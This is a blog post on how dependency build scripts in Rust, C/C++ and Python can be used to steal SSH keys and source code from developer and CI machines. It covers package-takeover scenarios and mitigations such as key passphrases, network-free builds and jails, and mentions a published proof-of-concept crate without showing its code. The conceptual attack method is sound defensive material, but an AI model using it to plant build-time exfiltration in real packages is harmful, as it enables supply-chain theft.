Dependencies and Trust
The fact that your dependencies execute arbitrary code at runtime is normal and OK - that’s literally how dependencies work. It sucks that they can do malicious things, but that’s the tradeoff for code reuse.
Arbitrary code at compile-time is a bit more interesting. Many languages support the ability to run custom build scripts as part of the package installation/build process, and while I’m yet to see an attack in the wild, this seems like fairly low-hanging fruit, and it’s only a matter of time.
Note that I’m not talking about typosquatting here - that’s definitely an issue, but it’s outside the scope of this post. I’d also consider it a more minor issue, since it relies on new projects being created with errors in their dependency lists, but an existing package made malicious has a much faster/wider scope (as it will affect existing projects).
Rather, I’m talking about a genuinely useful, widely-used package gone bad, or a situation similar to browser extension takeovers. One can easily imagine a situation where the developer of a widely-used package decides to stop maintaining the package for e.g. a lack of time, and someone with malicious intent “helpfully” puts their hand up to take over maintenance, or someone offers money to become the maintainer of the package. (This second scenario is a less likely, but it definitely happened with browser extension takeovers, so I assume it could happen with packages.)
Motivation
There are a few reasons I find build-time maliciousness more interesting. The first is that many production environments are properly isolated from the outside world (for example, with containers and/or firewalls). It is also the case that, for more complex software projects, the end product may not run directly on a developer’s machine - the developer might run tests and push to either a CI server which does the build, or to a staging environment.
A developer’s machine, on the other hand, often has unfettered access to the outside world, and often has interesting stuff lying around like source code (more valuable for proprietary codebases, of course) or SSH keys.
The second reason is related, but different - there are many more “exit points” for information gleaned at build time. While there may only be one prod instance, developers and CI jobs build the software countless times, and all it takes is a singly poorly-configured developer machine/CI host/container.
Implementation details
Following is a deeper dive into the specifics of implementing this attack in a few languages. Rust, C/C++, and Python are the languages I use day-to-day, so I’ll be looking at those
Rust
I’ve written some proof-of-concept code here, and I even went and published it to crates.io (if you’re not familiar with it, this is the Rust-endorsed source of external packages).
The code itself is very boring (check build.rs
in the root folder if you’re
unfamiliar with Rust), and clearly isn’t genuinely malicious (it just opens some
interesting files, and sends some harmless data over a network).
Rather, the interesting part is how easy it is to use this package, and that you
would see nothing untowards if you were to use this package. Nothing during
the download/installation/compilation process tells you that this package is
using a build.rs
(not uncommon for Rust packages, but possibly rare enough to
notify about), and it’ll just run that code completely silently.
C/C++
I’ve lumped these two together since their “build system” is the same. C/C++ both do very well in this area for a few reasons.
Firstly, there is no standard packaging system. If you want to use an external C/C++ dependency, the most common approach is to ensure that this package is installed system-wide, and link against it. Note the lack of a compilation step here. While OS package managers certainly come with their own trust issues, “not compiling in the first place” is certainly a valid way to stop compile-time attacks.
Secondly, even if you’re not linking against a system-wide installation, there is no standard build system even if you are compiling code. While GNU autotools, Cmake, Meson, etc. can all run code at compile time, if you’re integrating another C/C++ project into your own, the most common way I’ve seen of doing it is to keep your own copy of the dependency in the source tree, and extend your existing build system to that dependency.
If you’ve managed to both use an external repository for C/C++ dependencies, and integrate their build system into yours, then:
- Congratulations! I know from experience that can be very hard;
- You’re now vulnerable to such a compile-time attack.
While it isn’t invulnerable, the difficulty of using integrating dependencies in C/C++ certainly adds a layer of defence.
Python
Python is interesting in that there isn’t a compilation process. That said, setup.py
suffers the exact same problems as Rust’s build.rs
above. It’s possibly worse
in Python in that every package needs a setup.py
, and it’s normal for them to
spew a bunch of errors to stdout/stderr while running, so any warnings would
likely be missed. (Rust’s build process redirects stdout and stderr to files in
the build folder.)
Mitigations
Key passphrases
My guess is that only a minority of people have a passphrase on their private key. There are many things to steal apart from keys, but keys are especially valuable. If you don’t have a passphrase on your SSH key, go away and fix that right now! It’s important for defending against much more than this specific attack.
No network access during build
This is an approach Debian has taken as part of their reproducible builds reproducible builds project and is a valid layer. The problem here is that the build-time malicious code is free to read files at build time, and ship out their contents at a later time when the program has network access. This can certainly be locked down with the usual security measures (containers/firewalls/etc.), but it isn’t watertight.
Jails/Containerisation
A logical extension of “no network access during the build” is to use jails (or
containers) for builds is the most complete solution - enforcing at the OS level
that a process only has permissions to access the current directory and it’s
children and a couple of known-good system locations (e.g. /usr/include/
)
would definitely stop those attacks.
The main problem with this is the occasional build script that genuinely needs to do weird things (e.g. diesel introspecting a database to build a schema for compile-time database type safety). Package exceptions could of course be added, but the question is “who maintains these exceptions?” If the package authors do it, I can pretty much guarantee users will stop paying attention and we’ll be back at square one. If the end-users of the package are responsible for that whitelist, then it’ll definitely be well-audited, but is that an acceptable amount of pain to inflict on end-users of packages?